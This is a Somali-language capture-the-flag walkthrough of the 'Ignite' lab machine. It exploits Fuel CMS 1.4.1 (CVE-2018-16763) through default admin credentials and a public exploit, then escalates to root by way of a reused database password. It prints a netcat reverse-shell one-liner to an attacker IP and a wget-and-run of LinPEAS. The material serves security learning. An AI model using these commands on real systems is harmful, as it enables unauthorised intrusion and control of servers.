Setting Up Your First Penetration Testing Lab
Master advanced techniques and methodologies in lab setup
Hordhac
Maqaalkani wuxuu soo bandhigayaa cashar tallaabo-tallaabo ah (walkthrough) oo ku saabsan Ignite. Waxaan xoogga saaraynaa aqoonsiga iyo ka faa'iidaysiga nugulaanta Remote Code Execution (RCE) ee ku dhex jirta Fuel CMS v1.4.1 (CVE-2018-16763).Baadhitaankani wuxuu daboolayaa nidaamka macluumaad raadinta (enumeration), helitaanka daldaloolada, fulinta exploit-ka, iyo hawlaha ka dambeeya jabsashada. Sidoo kale, wuxuu muujinayaa sida loo kordhiyo mudnaanta (privilege escalation) iyadoo la adeegsanayo password-yo horay loo isticmaalay (credential reuse) oo ay sabab u tahay habayn xun, taas oo aakhirka noo horseedaysa inaan helno awoodda root.
Mawduucyada Muhiimka ah:
Enumeration: Macluumaad raadinta iyo aqoonsiga daldaloolada.
Exploit Analysis: Falanqaynta iyo fulinta exploit-ka.
Post-Exploitation: Waxqabadka ka dambeeya jabsashada iyo kordhinta mudnaanta (Privilege Escalation).
1: SCANNING
Sida Loo Adeegsado Nmap: Sahminta Amniga Qalabka (Target Reconnaissance) Maanta waxaan idinla wadaagayaa mid ka mid ah aaladaha ugu muhiimsan ee qof kasta oo baranaya Cybersecurity uu u baahan yahay: Nmap. Haddii aad rabto inaad ogaato waxa ka dhex socoda qalab ama server kale, Nmap waa saaxiibkaaga koowaad.
Waa maxay Scan-ka aan sameeyey?
Waxaan tijaabiyey amar aad u xooggan oo ah Aggressive Scan. Amarku wuxuu u qornaa gutan: nmap -sV -A -T4 10.81.139.78
-sV (Version Detection): Ma rabo kaliya inaan ogaado in port-ku furan yahay, waxaan rabaa inaan ogaado software-ka saxda ah ee halkaas ka shaqaynaya.
-A (Aggressive Mode): Kan waa "dhammaan-iyo-mid". Wuxuu isku darayaa ogaanshaha OS-ka, scripts-ka amniga, iyo raadraaca (traceroute).
-T4 (Speed): Waxaan kordhiyey xawaaraha baadhista si natiijadu degdeg iigu soo gaadho.
nmap -sV -A -T4 10.81.139.782: FOOTHOLD
Marka uu scan-ku kuu soo baxo, waxaad arki doontaa in port-ka 80 uu furan yahay. Haddii aad browser-ka ku qorto IP-ga 10.81.139.78, waxaad geli doontaa bogga hore ee Fuel CMS, halkaas oo aad ka heli doonto xog dheeraad ah oo ku saabsan database-ka iyo password-yada qaarkood.
Markii aad u dhaadhacday gunta hoose ee bogga, waxaad helaysaa xog aad u muhiim ah oo ah "Admin Endpoint" iyo "Credentials" (magaca iyo password-ka) ee lagu galo nidaamka. Tani waa meesha uu ka bilaabmo daciifnimada nidaamka Ignite.
Helitaanka Meesha laga galo (Admin Access) Intii aan ku jiray wejiga macluumaad raadinta (enumeration), waxaan u kuur-galay bogga hore ee websaydhka. Markii aan u dhaadhacay gunta hoose ee bogga (scrolling to the bottom), waxaan helay xog dahab ah oo inta badan dadka maamula websaydhada ay ilaawaan inay ka saaraan:
Admin Dashboard: /fuel
- Username: admin
- Password: admin
Maxay tani ka dhigan tahay?
Helitaanka bogga admin-ka iyo password-kiisa waxay noo furaysaa jid aan ku baadhno gudaha software-ka Fuel CMS. Maadaama aan hadda haysano marinka maamulka, waxaan bilaabi karnaa inaan tijaabino nugulaanta RCE (Remote Code Execution) si aan ula wareegno server-ka oo dhan.Gudaha u Galidda Dashboard-ka (Gaining Access)
Ka dib markii aan helay xogta gelitaanka, waxaan booqday cinwaanka ah http://10.81.139.78/fuel. Waxaan isticmaalay magaca iyo password-ka (admin / admin). Sidii la filayay, waxaan si guul leh ugu galay dashboard-ka maamulka ee Fuel CMS.
Maxay tahay muhiimadda tallaabadan? In kasta oo aan hadda gacanta ku hayo maamulka websaydhka, hadafkaygu maahan kaliya inaan wax ka beddelo bogga. Hadafka dhabta ah waa inaan helo awoodda Remote Code Execution (RCE).
Maadaama aan ogahay in mashiinkani uu ku shaqaynayo Fuel CMS v1.4.1, waxaan hadda xaqiijiyay inaan fulin karo weerar aan ku helayo Shell ama xukunka mashiinka oo dhan, waayo version-kan wuxuu leeyahay daldalool ammaan oo loo yaqaanno CVE-2018-16763.
3: Exploit Execution
Helitaanka Daldaloolada (Vulnerability Discovery)
Mashiinku wuxuu isticmaalayay Fuel CMS 1.4.1, kaas oo loo yaqaano inuu leeyahay nugulaan RCE ah. Baadhitaan aan ka sameeyey Google ayaa ii horseeday Exploit-DB (CVE-2018-16763). Sidoo kale, waxaan ku helay isla exploit-kaas anigoo adeegsanaya aaladda searchsploit.
Fahanka Exploit-ka (Understanding the Exploit)
Nugulaantan waxay ka dhalatay habayn xun oo xogta lagu galiyo qaybta filter ee cinwaanka /fuel/pages/select/ Tani waxay oggolaanaysaa in la dhex geliyo code PHP ah, taas oo horseedaysa in meel fog laga maamulo amarrada mashiinka (RCE).
- Sababta rasmiga ah: Validation la'aan ku saabsan waxyaabaha lagu qoro qaybta filter.
- Saamaynta Amniga: In qof aan la aqoonsan uu fuliyo amarrada nidaamka.
searchsploit FUEL CMS 1.4python 50477.py -u http://10.91.139.78/
whoami
ls
pwd
cd /home4: Post Exploitation
Ka dib markii aan xaqiijiyay inaan fulin karo amarrada (RCE), waxaan go'aansaday inaan u beddelo xidhiidhkaas mid Reverse Shell ah si aan u helo terminal dhamaystiran oo aan kula macaamilo mashiinka.
Waxaan u adeegsaday websaydhka revshells.com si aan u diyaariyo code-ka (payload) ee nooca Python ama Bash ah. Ka dib markii aan mashiinkayga ka dhex furay "Listener" anigoo adeegsanaya amarka nc -lvnp 4444 waxaan mashiinka Ignite ku dhex fuliyey amarkii reverse shell-ka.
Isla markiiba, waxaan helay marin (access) aan ku galo mashiinka sidii user-ka www-data. Si aan terminal-ka uga dhigo mid u shaqeeya sidii "Real Shell" oo kale (Interactive Shell), waxaan isticmaalay amarka:
python -c 'import pty; pty.spawn("/bin/bash")'Markii aan helay xidhiidhka "Reverse Shell" oo aan terminal-ka ka dhigay mid u shaqaynaya si buuxda (Interactive Shell), waxaan bilaabay inaan baadho faylasha mashiinka. Maadaama aan ahaa isticmaalaha www-data, waxaan markiiba helay calankii koowaad ee loo yaqaano User Flag.
Tani waxay xaqiijisay inaan si guul leh u dhex galay nidaamka, balse wali ma ahayn "Root" (maamulaha guud), sidaas darteed waxaan u baahnaa inaan raadiyo wado aan ku kordhiyo mudnaantayda (Privilege Escalation).
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.219.158 1111 >/tmp/f5: PRIVILEGE ESCALATION
Baadhista Mudnaan Kordhinta (Privilege Escalation Research)
Maadaama aan ahaa isticmaalaha caadiga ah ee www-data, waxaan u baahnaa inaan helo jid aan ku noqdo maamulaha guud (Root). Si aan shaqadaas u fududeeyo, waxaan mashiinka Ignite ku wareejiyey script-ka caanka ah ee LinPEAS.LinPEAS wuxuu si qotodheer u baadhay dhamaan faylasha nidaamka, wuxuuna calaamadiyey (highlighted) xog aad u muhiim ah: Hardcoded Credentials oo ku dhex jira fayl gurmad ah (backup file).
cp /usr/share/peass/linpeas/linpeas.sh
python -m http.serverwget http://192.168.219.158:8000/linpeas.sh
ls
chmod +x linpeas.sh
./linpeas.shHelitaanka Password-ka Root
Markii aan gacantayda ku baadhay faylkaas uu LinPEAS ii tilmaamay, waxaan helay password si cad u qoran (plaintext). Waxaan tuhmay in password-kani uu ka tirsan yahay isticmaalaha root, maadaama dadka qaarkood ay caado u leeyihiin inay hal password meelo badan u isticmaalaan (Credential Reuse).cat /var/www/html/fuel/application/config/database.phpWaxaan isku dayey inaan u beddelo user-ka root anigoo adeegsanaya amarka: su root
Waxaan galiyey password-kii aan helay, waxaana isla markiiba noqday Root!
Root Flag
Hadda oo aan haysto awoodda ugu sarraysa ee mashiinka, waxaan u dhaqaaqay dhanka galka /root si aan u soo saaro calankii ugu dambeeyey: cat /root/root.txtGunaanad: Maxaan ka baranay Ignite?
Mashiinkan wuxuu tusaale u yahay sida silsilad daciifnimo ah ay u horseedi karto in mashiinka oo dhan la xukumo:- 1: CMS Duug ah: Isticmaalka Fuel CMS 1.4.1 oo leh daldalool RCE ah.
- 2: Xog aan la qarin: Kaydinta password-yada muhiimka ah iyagoo qoraal cad ah (plaintext) dhexdiisa faylal gurmad ah.
- 3: Password Reuse: Isticmaalka hal password oo loogu talagalay adeegyo kala duwan.